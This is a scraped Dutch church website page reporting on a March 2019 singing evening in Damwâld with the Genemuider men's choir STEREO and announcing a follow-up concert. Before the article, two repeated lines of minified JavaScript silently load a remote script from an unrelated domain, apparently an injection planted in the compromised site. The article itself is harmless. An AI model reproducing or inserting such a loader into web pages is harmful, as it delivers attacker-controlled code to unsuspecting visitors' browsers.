;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hartverwarmende en getuigende zangavond in Damwâld - PKN Damwâld

Hartverwarmende en getuigende zangavond in Damwâld

Gepubliceerd op: maandag 8 april 2019

Zaterdag 30 maart was het zover: opnieuw een zangavond van Zingend naar de Zondag in de Ontmoeting te Damwâld. De organisatie was er helemaal klaar voor, net als het Genemuider mannenkoor STEREO dat met ongeveer 100 zangers op zou treden.

Ook nu was er bij beide weer een gezonde spanning en verwachting, maar vooral ook het besef dat alles niet in onze handen ligt maar dat onze Heer alles bestuurt en maakt. Voor de vierde keer kijken wij terug op een zeer geslaagde avond en dat maakt het lastig om erover te schrijven zonder in herhaling te vallen.

Er zijn veel facetten die bepalen of iedereen wel of niet tevreden of zelfs opgetogen naar huis kan gaan. Te denken valt aan het optreden van het koor, de opkomst van het publiek, het meedoen van het publiek aan samenzang, door enthousiasme en steunbetuiging aan koor en elkaar maar ook organisatorisch moet het kloppen. Deze keer, in een bomvolle kerk, vielen alle puzzelstukjes samen, meer nog dan vorige keren. Het was hartverwarmend, om stil van te worden!! Het koor ging om het zomaar te zeggen Uit z’n Dak, daartoe uitgedaagd en aangespoord door dirigent Harm Hoeve en  organist Jorrit Woudt en niet in de laatste plaats door het publiek. Wat een kwaliteit!

Wat opviel was de saamhorigheid van alle aanwezigen en het opgetogen en uitbundig meedoen. Iets dat later met name door de dirigent als opvallend werd bevestigd. Hij komt graag terug!!

It’s in the air, het was in de lucht, niet te stoppen!! Prachtig om met z’n allen op deze manier enthousiast het geloof in onze God te belijden. Alle ingrediënten waren aanwezig en bovenal het gevoel, het weten en ervaren van Gods hand en aanwezigheid. De algemene leiding deze avond was in handen van onze eigen dominee Boukes. Hij deed dat met veel gevoel met het oog op Pasen en was losjes en gevat waar dat kon.  Dank daarvoor en dank aan alle vrijwilligers die zich meteen al weer spontaan aanmeldden voor de volgende zangavond op 26 oktober 2019 met medewerking van het Groninger Chr. Mannenkoor Albatros o.l.v. Anton Schulp. Wij hebben afgelopen kerst hun uitvoering bijgewoond en één ding is zeker, het belooft weer een prachtige en inspirerende avond te worden.  U bent allemaal van harte uitgenodigd!

Onze dank gaat ook uit naar de Gereformeerde kerk voor alle faciliteiten en naar de koster voor zijn inzet.

De organisatie.

Terugluisteren:

Foto's